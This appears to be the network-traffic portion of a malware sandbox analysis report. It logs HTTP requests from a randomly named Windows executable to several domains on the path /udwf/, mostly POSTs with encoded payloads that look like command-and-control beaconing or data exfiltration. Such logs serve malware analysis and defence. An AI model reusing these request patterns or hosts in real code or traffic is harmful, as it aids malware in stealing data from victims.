                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.diabloseugene.com
                                                                                                                            Referer: http://www.diabloseugene.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=U4Z6tm4FxojtGb+nsJT4QUskQ8ysITgCIoKa7hvpoQgios5xL51ARvBVMjxsgf0aaJ2Bpkz4cBepvfL9BE19vzwM7EvlALB9UIMQ2Lm8OD5I2S+xY1laG50P9cSm5kVJh/9btMgJpFZnmstuLbxFX+8mFqV5otER/i5hHHU4U885LHubZHZJOy8VrCjjDBuuLYebUfJL4RwKhKSmXDv/nSeWKqyWDoslmurD8uulmUAUrR5KD3Kzm5kbP1EeXIFGd2P8B9lMzC72CpfDmjGKznBjJF8RvMDAmTKq3QgjePgwNYlbeA+OInCVacn/rPh46Ih3vCJLu35SR3I2lfqoLlroQ9YwZzYKbVw6n1yuoErg7wqJtu1+Dp6lXuRu8kOqqXXPlMxhoRjQbY8ovHv2hq0aIsQ542UAfMVhxEpA+muUBoKSZAZxCYidt+VsEgtKnb7g3RLV0dfsBK1z9qaoOQgRkIBXH6pU5cbbxaNNKitEmy1fcOyIVOW8MR3d9rJMr88QLZhEgySMuw8OIhFqUlbaqptrTV+qL4XytE2yCmLVVkWdK9dFhHoKHfkldAd+OOU1kHnJHFitIvjD5zgalDgGGmlHRnutGIiZK7HnhJusTz/utBWLqElRYhJ2QjVxNnPUEC3xv9ecrD2sj4qLSsqJ7YkFuM6VY/4Rf3RZKl+cwTa1HjWnkplMphvxTsy1iXqqSGlT2knV5+soHn/nRG4wWUQq2n0SjxpetBeB/Xx7JLNnMD+rw0bdVGS0ENqcRO+8l8Q6ZqdadbbkYf9/PmImFaPWA4IfURkklZyVKWy81SP1S4v6XwkS1gw+KZuBROLpLxvE8i1o+wOEgQy3vAdPYVh9ndZv2M9R11iUYAqA5Xb1Ck0dkVY/I6HAoUTA3OE9DsGAljl8vW04NuSpUaJ1AD2LKrEh1d3AiWT6CyfnUREEs0i3EbvlZ7MGaNwipuLOevBwNK5sFRrpgHyvy8+d5Pqr/PX0fMThR4h1lkuWTKxW9NFMLHGR95Fu6FVTlj/mLHugIxqS+y817p5g4/EgH+cESCT9n5gthykZmyFK7C1bMYaZPoqeJfD3QMmID9yWug3RDZVuytYyzlIPpPaFCPnXE3zOwP620Q3EHpKcBEDEYzL85tOmtxSPoq9RwfcQ9B6AzGmmYp+1nm7WRWl08UzktpdKHNnZ28fhm7JkrEPy0siM8g3l9GmN
Nov 10, 2023 09:28:36.084145069 CET | 198 | IN | HTTP/1.1 200 OK
                                                                                                                            date: Fri, 10 Nov 2023 08:28:35 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1109
                                                                                                                            x-request-id: f0f8da48-c0bd-4ffa-9dd2-36b75af5a4f0
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_utrfvT18rLbkeWw3m+7aR4sW5K9D3ILMt3IRjGq+Uvf2ZaEZaFIKFbYzks2ocpn/4rY4FmPl0q6B7hNzo7390w==
                                                                                                                            set-cookie: parking_session=f0f8da48-c0bd-4ffa-9dd2-36b75af5a4f0; expires=Fri, 10 Nov 2023 08:43:35 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_utrfvT18rLbkeWw3m+7aR4sW5K9D3ILMt3IRjGq+Uvf2ZaEZaFIKFbYzks2ocpn/4rY4FmPl0q6B7hNzo7390w==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
Nov 10, 2023 09:28:36.084173918 CET | 199 | IN |
                                                                                                                            Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjBmOGRhNDgtYzBiZC00ZmZhLTlkZDItMzZiNzVhZjVhNGYwIiwicGFnZV90aW1lIjoxNjk


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.10 | 49731 | 199.59.243.225 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:28:38.482089043 CET | 200 | OUT | GET /udwf/?G0Yxd2Q=Z6xauRs66pTCKL+KzoyNUFozWOf0JDAANa247hz++z0llrRDJuB/QadTAD9i3swhMbuTmmXjFgWivfbmORZNoncA7F7QHJ1+AA==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.diabloseugene.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Nov 10, 2023 09:28:38.750719070 CET | 201 | IN | HTTP/1.1 200 OK
                                                                                                                            date: Fri, 10 Nov 2023 08:28:37 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1409
                                                                                                                            x-request-id: 9e5c3718-e18e-4436-b653-0e660b594865
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXSFtrj/Leu/y185Xp21xCUpFSO1GnNJqoJVnoz/61k7l2zuTl+e3OgoxMgGsxYpYKk4IjLOQG75FHUn2X/MZg==
                                                                                                                            set-cookie: parking_session=9e5c3718-e18e-4436-b653-0e660b594865; expires=Fri, 10 Nov 2023 08:43:38 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXSFtrj/Leu/y185Xp21xCUpFSO1GnNJqoJVnoz/61k7l2zuTl+e3OgoxMgGsxYpYKk4IjLOQG75FHUn2X/MZg==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
                                                                                                                            Nov 10, 2023 09:28:38.750745058 CET | 202 | IN |
                                                                                                                            Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWU1YzM3MTgtZTE4ZS00NDM2LWI2NTMtMGU2NjBiNTk0ODY1IiwicGFnZV90aW1lIjoxNjk


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            17 | 192.168.2.10 | 49732 | 162.0.222.119 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:28:44.188903093 CET | 203 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.spark-tech-global.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.spark-tech-global.xyz
                                                                                                                            Referer: http://www.spark-tech-global.xyz/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=kdiO9dFLk3fHEpTma70fRZuW/E2pI4EqoqwoutsadIK84fnGL1L3HIQ4bGfJSynmsk313fux9qUZ743ls8Kjxb1iMzXnLcvZg8PIoFO9G7CwAF1Xi+mgtY1TzFhc+WX7ks9QMzNGGFDMX9IeoHojV2XjM4RD5OljzlsaG7aNFcxRgD5EkA==
                                                                                                                            Nov 10, 2023 09:28:44.492309093 CET | 204 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Fri, 10 Nov 2023 08:28:44 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            18 | 192.168.2.10 | 49733 | 162.0.222.119 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:28:46.913254023 CET | 205 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.spark-tech-global.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.spark-tech-global.xyz
                                                                                                                            Referer: http://www.spark-tech-global.xyz/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=kdiO9dFLk3fHFNvmcYsfX5uVwk2pGYFhoqsoup0Kd6e8/+XGK3j3AIQ4UmfMKSnxsk793fix9qoZ79zltPSkwL1sETXhG8vZg8PIoFbSG7awAVFXjcevzI1Uk1hc6WWyks81MyQTGAHMX/AeoSI8c2XpCYQP/vILv38dNO+uZbYdhWVXjwJpYtTKHsXys0YyAZ+dqbI=
                                                                                                                            Nov 10, 2023 09:28:47.207586050 CET | 206 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Fri, 10 Nov 2023 08:28:47 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            19 | 192.168.2.10 | 49734 | 162.0.222.119 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:28:51.157749891 CET | 208 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.spark-tech-global.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.spark-tech-global.xyz
                                                                                                                            Referer: http://www.spark-tech-global.xyz/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=
                                                                                                                            Nov 10, 2023 09:28:51.456449032 CET | 209 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Fri, 10 Nov 2023 08:28:51 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            2 | 192.168.2.10 | 49716 | 23.227.38.74 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:27:48.029633999 CET | 89 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.littlehappiez.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.littlehappiez.com
                                                                                                                            Referer: http://www.littlehappiez.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=Q1/lM+s6OY3jeqx/wMiabhIWuRGcLGK7GkhS6DGdjMelzNFlOrKhjQSBVO8HRfQuZF0TSvJlvgfpQEJ33/6chrrC44EuTzKucP2coPZ4lYx8aIND6cIK7kSupW2bnfnNjYFtV3UsNaba3aJ3qex7n2xMu3M23D+FquWKZtJz6Kpc8WdTnR+/pxz5taYECMnta/y14r8=
                                                                                                                            Nov 10, 2023 09:27:48.808260918 CET | 90 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Fri, 10 Nov 2023 08:27:48 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            X-Sorting-Hat-PodId: 293
                                                                                                                            X-Sorting-Hat-ShopId: 83935199526
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-ShopId: 83935199526
                                                                                                                            X-ShardId: 293
                                                                                                                            Content-Language: en-US
                                                                                                                            Set-Cookie: localization=US; path=/; expires=Sun, 10 Nov 2024 08:27:48 GMT; SameSite=Lax
                                                                                                                            Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 11 Nov 2023 08:27:48 GMT; SameSite=Lax
                                                                                                                            Set-Cookie: _shopify_y=1c95b64a-cbaf-4aa7-b895-a0d261c3e83b; Expires=Sat, 09-Nov-24 08:27:48 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                            Set-Cookie: _shopify_s=589267fe-b53a-4fab-acae-faae851dc44c; Expires=Fri, 10-Nov-23 08:57:48 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                            Server-Timing: processing;dur=426
                                                                                                                            X-Shopify-Stage: production
                                                                                                                            Content-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=1e7f5e7f-acb5-464
                                                                                                                            Data Raw:
                                                                                                                            Data Ascii:
                                                                                                                             Nov 10, 2023 09:27:48.808281898 CET | 91 | IN
                                                                                                                             Data Ascii: -9f09-5658300f9768
                                                                                                                             X-Content-Type-Options: nosniff
                                                                                                                             X-Download-Options: noopen
                                                                                                                             X-Permitted-Cross-Domain-Policies: none
                                                                                                                             X-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                             20 | 192.168.2.10 | 49735 | 162.0.222.119 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                             Timestamp | kBytes transferred | Direction | Data
                                                                                                                             Nov 10, 2023 09:28:53.881416082 CET | 209 | OUT | GET /udwf/?G0Yxd2Q=pfKu+pVNsln4G6X0TIcdarC36EKmJps8u6QQpqwTd4K74JvWDy/kIYo7R3ufamPFtUrh+tiM68Q084b5gYWBh8dmFEHsBv37jg==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.spark-tech-global.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                             Nov 10, 2023 09:28:54.178764105 CET | 210 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Fri, 10 Nov 2023 08:28:53 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                             21 | 192.168.2.10 | 49736 | 91.195.240.19 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                             Timestamp | kBytes transferred | Direction | Data
                                                                                                                             Nov 10, 2023 09:28:59.698246956 CET | 211 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.otternaut.live
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.otternaut.live
                                                                                                                            Referer: http://www.otternaut.live/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=kbQnce+vuQ4lEiRdFFtvBPnXR3qNGZWm+4PvXu/v6n8K+Ob1G1CVecPvxSIwk4aMj9nRq64mSIJyCdWr9ACWSif4QXJcAmOj3m2vc/NkbpeY1YFRIGMDPBWc+EpuIsdk5aWy+g/EcNj9OnPGVT1MlTskXf76+Zbyt1fSwH4NgPnGZVy3Xw==
                                                                                                                             Nov 10, 2023 09:29:00.005218029 CET | 212 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:28:59 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                             22 | 192.168.2.10 | 49737 | 91.195.240.19 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                             Timestamp | kBytes transferred | Direction | Data
                                                                                                                             Nov 10, 2023 09:29:02.526262999 CET | 213 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.otternaut.live
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.otternaut.live
                                                                                                                            Referer: http://www.otternaut.live/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=kbQnce+vuQ4lECBdDixvGvnUS3qNfJWq+4DvXv7/6VoK+sT1UhuVS8Pv+yI/qYbCj9rnq4smSINyCZar+zqVSyf6JHJeEmOj3m2vc/JCbpWY0oVRLnMAMBWT9Epuecdg5aXR+hzicLn9Om/GVBNTvTsmKP6/2IuJu1PuxHgN3oWlYAekQJpdHE4iYtSPbgzfNqCvN3k=
                                                                                                                             Nov 10, 2023 09:29:02.832225084 CET | 213 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:29:02 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                             23 | 192.168.2.10 | 49738 | 91.195.240.19 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                             Timestamp | kBytes transferred | Direction | Data
                                                                                                                             Nov 10, 2023 09:29:05.356878042 CET | 215 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.otternaut.live
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.otternaut.live
                                                                                                                            Referer: http://www.otternaut.live/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                             Data Ascii: G0Yxd2Q=
                                                                                                                             Nov 10, 2023 09:29:05.666801929 CET | 216 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:29:05 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                             24 | 192.168.2.10 | 49739 | 91.195.240.19 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                             Timestamp | kBytes transferred | Direction | Data
                                                                                                                             Nov 10, 2023 09:29:09.030483961 CET | 217 | OUT | GET /udwf/?G0Yxd2Q=pZ4HfquroA03Gi5vNwF4ItLuSTGmPoiR8InmRf339X8P+rCcKVr0Urjn620xlb/Iiubkhpo0DqZ1bcej5UiuLGGOXANOCS2GgQ==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.otternaut.live
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                             Nov 10, 2023 09:29:09.401205063 CET | 218 | IN | HTTP/1.1 200 OK
                                                                                                                            date: Fri, 10 Nov 2023 08:29:09 GMT
                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                            transfer-encoding: chunked
                                                                                                                            vary: Accept-Encoding
                                                                                                                            x-powered-by: PHP/8.1.17
                                                                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                            pragma: no-cache
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_IJ6FVAJhvltVWAuToP4oL4atM71fkzPY7QYrgWTQ/RoOG0ccJaLLTy6N9einZpywHDc0RBAe9H6fep8xyV5umg==
                                                                                                                            last-modified: Fri, 10 Nov 2023 08:29:09 GMT
                                                                                                                            x-cache-miss-from: parking-698fb476bf-xqxcz
                                                                                                                            server: NginX
                                                                                                                            connection: close
